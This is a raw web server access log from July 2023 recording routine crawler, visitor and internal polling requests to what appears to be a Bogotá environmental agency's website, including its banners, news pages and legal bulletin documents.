201.244.96.113 - - [07/Jul/2023:01:22:31 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
201.244.96.113 - - [07/Jul/2023:01:22:32 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
201.245.192.253 - - [07/Jul/2023:01:23:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:24:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:22:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.197 - - [07/Jul/2023:01:24:57 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:01:23:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
191.156.186.1 - - [07/Jul/2023:01:28:49 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR1n0HFkOgJO6DcQHA6bFViO14Gp3m7nAlnLroPk0Hp3lNz4TwDQdTtFnBk_aem_AZY8fhfhwKPn2jtJKmxbN-StYlNcYLp1hNCRlBJeilSXLsacpMBNSE4vajh6GEejnXHMOYYaw8u4xuHpL-aq1TqH HTTP/1.1" 200 783
201.245.192.253 - - [07/Jul/2023:01:28:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:29:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:29:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/SENTENCIA%20C-703%20DE%202010.xls HTTP/1.1" 304 -
201.245.192.253 - - [07/Jul/2023:01:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39494
201.245.192.253 - - [07/Jul/2023:01:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:01:30:09 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
40.77.167.189 - - [07/Jul/2023:01:30:14 -0500] "GET /images/calidad-del-aire-suroccidental_optimized.jpeg HTTP/1.1" 200 175446
172.22.2.4 - - [07/Jul/2023:01:28:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:29:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
201.245.192.253 - - [07/Jul/2023:01:33:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:34:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:34:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.3 - - [07/Jul/2023:01:36:40 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
173.252.95.116 - - [07/Jul/2023:01:36:40 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
52.167.144.38 - - [07/Jul/2023:01:36:45 -0500] "GET /forest/ HTTP/1.1" 200 12041
52.167.144.38 - - [07/Jul/2023:01:36:45 -0500] "GET /bla/resoluciones/index.php?dir=autos+2012 HTTP/1.1" 200 276315
172.22.2.4 - - [07/Jul/2023:01:35:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [07/Jul/2023:01:38:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:39:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:01:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39494
201.245.192.253 - - [07/Jul/2023:01:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
191.156.148.190 - - [07/Jul/2023:01:40:39 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.156.148.48 - - [07/Jul/2023:01:40:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.156.144.18 - - [07/Jul/2023:01:40:39 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
40.77.167.189 - - [07/Jul/2023:01:40:46 -0500] "GET /images/Reciclaton-2023.jpg HTTP/1.1" 200 68883
172.22.2.4 - - [07/Jul/2023:01:40:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:41:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
157.55.39.212 - - [07/Jul/2023:01:43:15 -0500] "GET /images/palma-silvestre_optimized.jpeg HTTP/1.1" 200 46816
201.245.192.253 - - [07/Jul/2023:01:43:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:44:04 -0500] "HEAD / HTTP/1.1" 200 -
69.63.189.10 - - [07/Jul/2023:01:44:49 -0500] "GET /entrenubes-raton-de-montana-se-alimenta-de-hongos-presentes-en-este-ecosistema-del-suroriente-de-bogota.html HTTP/1.1" 200 843
172.22.2.4 - - [07/Jul/2023:01:46:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:47:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [07/Jul/2023:01:48:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:49:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.196 - - [07/Jul/2023:01:49:09 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:01:52:25 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7496
172.22.2.4 - - [07/Jul/2023:01:52:37 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [07/Jul/2023:01:52:37 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [07/Jul/2023:01:52:41 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [07/Jul/2023:01:52:41 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [07/Jul/2023:01:52:41 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
157.55.39.214 - - [07/Jul/2023:01:53:36 -0500] "GET /transparencia/financiera/? HTTP/1.1" 200 74577
172.22.2.4 - - [07/Jul/2023:01:52:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:01:53:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:54:04 -0500] "HEAD / HTTP/1.1" 200 -
45.79.181.179 - - [07/Jul/2023:01:54:21 -0500] "GET / HTTP/1.1" 200 319
18.140.158.193 - - [07/Jul/2023:01:54:30 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/? HTTP/1.1" 404 1490
18.140.158.193 - - [07/Jul/2023:01:54:32 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/? HTTP/1.1" 404 1490
172.22.2.4 - - [07/Jul/2023:01:52:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
35.204.111.29 - - [07/Jul/2023:01:56:03 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
40.77.167.161 - - [07/Jul/2023:01:58:19 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago3G.jpg HTTP/1.1" 200 271832
201.245.192.253 - - [07/Jul/2023:01:58:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:01:59:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:01:57:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.127.17 - - [07/Jul/2023:02:00:14 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_id=Julio_2023 HTTP/1.1" 206 783
172.22.2.4 - - [07/Jul/2023:01:58:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54942
172.22.2.4 - - [07/Jul/2023:01:59:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58474
13.215.73.134 - - [07/Jul/2023:02:03:29 -0500] "GET /galeria/nivo-slider/demo/convocatorias.html? HTTP/1.1" 200 3464
13.215.73.134 - - [07/Jul/2023:02:03:30 -0500] "GET /galeria/nivo-slider/demo/images/bannerconvocatoriaacercar.jpg HTTP/1.1" 200 91528
201.245.192.253 - - [07/Jul/2023:02:03:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
3.91.76.44 - - [07/Jul/2023:02:03:49 -0500] "GET /portaldeninos/ HTTP/1.1" 200 111145
172.22.2.4 - - [07/Jul/2023:02:03:56 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [07/Jul/2023:02:04:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:03:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.214 - - [07/Jul/2023:02:05:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/6130.pdf HTTP/1.1" 200 258915
172.22.2.4 - - [07/Jul/2023:02:04:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56452
186.155.69.238 - - [07/Jul/2023:02:07:28 -0500] "GET /postulate-al-programa-de-mujeres-por-el-cambio-climatico-en-bogota.html HTTP/1.1" 200 856
52.167.144.38 - - [07/Jul/2023:02:08:28 -0500] "GET /POT-2013/Cartografia/15_Sistema%20de%20Movilidad%20_Secciones%20Viales_Circuitos_movilida.pdf HTTP/1.1" 304 -
201.245.192.253 - - [07/Jul/2023:02:08:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:09:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:10:06 -0500] "GET /BLA/boletinlegal/Circulares/2022/DIRECTIVA%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 200 370015
66.249.66.194 - - [07/Jul/2023:02:11:04 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:02:09:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:10:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
201.245.192.253 - - [07/Jul/2023:02:13:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:14:04 -0500] "HEAD / HTTP/1.1" 200 -
64.31.47.126 - - [07/Jul/2023:02:16:08 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 2324
40.77.167.189 - - [07/Jul/2023:02:16:18 -0500] "GET /images/empresas-alertas_optimized.jpeg HTTP/1.1" 200 142365
172.22.2.4 - - [07/Jul/2023:02:15:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.38 - - [07/Jul/2023:02:17:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/1362.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jul/2023:02:16:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52855
201.245.192.253 - - [07/Jul/2023:02:18:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:19:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:02:19:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39650
201.245.192.253 - - [07/Jul/2023:02:19:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:02:21:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:22:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
201.245.192.253 - - [07/Jul/2023:02:23:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:24:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.193 - - [07/Jul/2023:02:28:40 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:02:27:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:02:28:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:29:04 -0500] "HEAD / HTTP/1.1" 200 -
122.248.192.130 - - [07/Jul/2023:02:29:27 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:02:27:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [07/Jul/2023:02:29:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39650
201.245.192.253 - - [07/Jul/2023:02:29:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
52.167.144.38 - - [07/Jul/2023:02:31:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/5399.pdf HTTP/1.1" 304 -
167.99.70.135 - - [07/Jul/2023:02:33:16 -0500] "-" 408 -
201.245.192.253 - - [07/Jul/2023:02:33:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:34:04 -0500] "HEAD / HTTP/1.1" 200 -
179.43.163.133 - - [07/Jul/2023:02:34:30 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [07/Jul/2023:02:32:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.161 - - [07/Jul/2023:02:34:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/1543.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jul/2023:02:33:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [07/Jul/2023:02:38:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
181.59.3.154 - - [07/Jul/2023:02:38:59 -0500] "-" 408 -
216.245.221.92 - - [07/Jul/2023:02:39:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:02:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39650
201.245.192.253 - - [07/Jul/2023:02:39:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:02:38:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:39:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
162.55.175.143 - - [07/Jul/2023:02:41:50 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Jul/2023:02:43:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:44:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:44:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:45:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
201.245.192.253 - - [07/Jul/2023:02:48:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:49:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:50:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:02:51:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
201.245.192.253 - - [07/Jul/2023:02:53:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:02:54:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.196 - - [07/Jul/2023:02:54:57 -0500] "-" 408 -
172.22.2.4 - - [07/Jul/2023:02:56:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:02:58:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:02:57:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53248
216.245.221.92 - - [07/Jul/2023:02:59:04 -0500] "HEAD / HTTP/1.1" 200 -
3.0.161.74 - - [07/Jul/2023:02:59:06 -0500] "GET /galeria/nivo-slider/demo/convocatorias.html? HTTP/1.1" 200 3464
3.0.161.74 - - [07/Jul/2023:02:59:06 -0500] "GET /galeria/nivo-slider/demo/images/bannerconvocatoriaacercar.jpg HTTP/1.1" 200 91528
40.94.97.100 - - [07/Jul/2023:02:59:53 -0500] "GET /te-contamos-como-instalar-un-contenedor-para-baterias-de-litio-en-tu-establecimiento.html HTTP/1.1" 200 892
201.245.192.253 - - [07/Jul/2023:03:03:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.84.89.211 - - [07/Jul/2023:03:03:41 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR2kDzOn8xEmbAID2jsVQlg6xx9DxZb1YlWAv_U-rSBebYJOOuXmDgcM4P0_aem_AZZwR8xs4waCdX43_cNnYjIg0jztW5BCW4LKAEx_1gx57LuxMhlKoqwDprfRvoKKZc_v_T9zr2eg7Q6hDG07BqpM HTTP/1.1" 200 783
172.22.2.4 - - [07/Jul/2023:03:02:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
18.143.242.68 - - [07/Jul/2023:03:03:47 -0500] "GET /transparencia/financiera/Desagregado%20con%20modificaciones/? HTTP/1.1" 404 1484
216.245.221.92 - - [07/Jul/2023:03:04:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:02:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
172.22.2.4 - - [07/Jul/2023:03:05:48 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [07/Jul/2023:03:05:50 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61779
94.102.61.10 - - [07/Jul/2023:03:07:39 -0500] "GET /portaldeninos/ HTTP/1.1" 200 14393
201.245.192.253 - - [07/Jul/2023:03:08:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:09:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:07:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:08:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58079
116.202.20.140 - - [07/Jul/2023:03:12:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [07/Jul/2023:03:13:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:14:04 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.38 - - [07/Jul/2023:03:15:04 -0500] "GET /Publicaciones/2022EE190618.pdf HTTP/1.1" 404 228
172.22.2.4 - - [07/Jul/2023:03:13:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:14:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
66.249.66.192 - - [07/Jul/2023:03:16:13 -0500] "-" 408 -
201.245.192.253 - - [07/Jul/2023:03:18:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.212 - - [07/Jul/2023:03:18:50 -0500] "GET /images/procesos-de-formacion-ambiental.jpg HTTP/1.1" 200 48188
216.245.221.92 - - [07/Jul/2023:03:19:04 -0500] "HEAD / HTTP/1.1" 200 -
44.228.64.221 - - [07/Jul/2023:03:19:25 -0500] "GET /galeria/galeria/fotos/Humedal-techo1P.jpg HTTP/1.1" 200 33428
201.245.192.253 - - [07/Jul/2023:03:19:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39646
201.245.192.253 - - [07/Jul/2023:03:19:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:03:19:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:20:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52495
201.245.192.253 - - [07/Jul/2023:03:23:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:24:04 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.198 - - [07/Jul/2023:03:24:57 -0500] "-" 408 -
185.180.143.48 - - [07/Jul/2023:03:25:45 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
157.55.39.214 - - [07/Jul/2023:03:26:14 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
40.77.167.161 - - [07/Jul/2023:03:26:19 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
40.77.167.161 - - [07/Jul/2023:03:26:19 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
40.77.167.161 - - [07/Jul/2023:03:26:19 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
172.22.2.4 - - [07/Jul/2023:03:25:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:26:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
201.245.192.253 - - [07/Jul/2023:03:28:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:29:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:03:29:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39646
201.245.192.253 - - [07/Jul/2023:03:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
151.236.216.218 - - [07/Jul/2023:03:30:46 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
66.249.70.196 - - [07/Jul/2023:03:31:20 -0500] "-" 408 -
162.55.35.116 - - [07/Jul/2023:03:31:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [07/Jul/2023:03:31:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2023:03:33:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:03:32:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55739
52.167.144.38 - - [07/Jul/2023:03:33:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/2019.pdf HTTP/1.1" 304 -
216.245.221.92 - - [07/Jul/2023:03:34:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:33:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
52.167.144.38 - - [07/Jul/2023:03:34:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2520.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jul/2023:03:36:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
52.167.144.38 - - [07/Jul/2023:03:38:05 -0500] "GET /BLA/resoluciones/AUTOS%202022/0449.pdf HTTP/1.1" 304 -
201.245.192.253 - - [07/Jul/2023:03:38:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [07/Jul/2023:03:37:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Jul/2023:03:39:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:37:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58825
201.245.192.253 - - [07/Jul/2023:03:39:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39646
201.245.192.253 - - [07/Jul/2023:03:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
40.77.188.42 - - [07/Jul/2023:03:42:10 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.188.42 - - [07/Jul/2023:03:42:10 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.188.42 - - [07/Jul/2023:03:42:10 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.188.42 - - [07/Jul/2023:03:42:10 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.188.42 - - [07/Jul/2023:03:42:10 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.188.42 - - [07/Jul/2023:03:42:10 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
201.245.192.253 - - [07/Jul/2023:03:43:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:44:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2023:03:42:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.141.145.65 - - [07/Jul/2023:03:45:10 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
172.22.2.4 - - [07/Jul/2023:03:43:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59192
52.167.144.38 - - [07/Jul/2023:03:46:47 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20323%20de%202018.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jul/2023:03:47:26 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%201%20del%2004%20de%20Abril%20de%202013.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jul/2023:03:47:27 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 304 -
66.249.66.192 - - [07/Jul/2023:03:48:27 -0500] "-" 408 -
201.245.192.253 - - [07/Jul/2023:03:48:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [07/Jul/2023:03:49:04 -0500] "HEAD / HTTP/1.1" 200 -
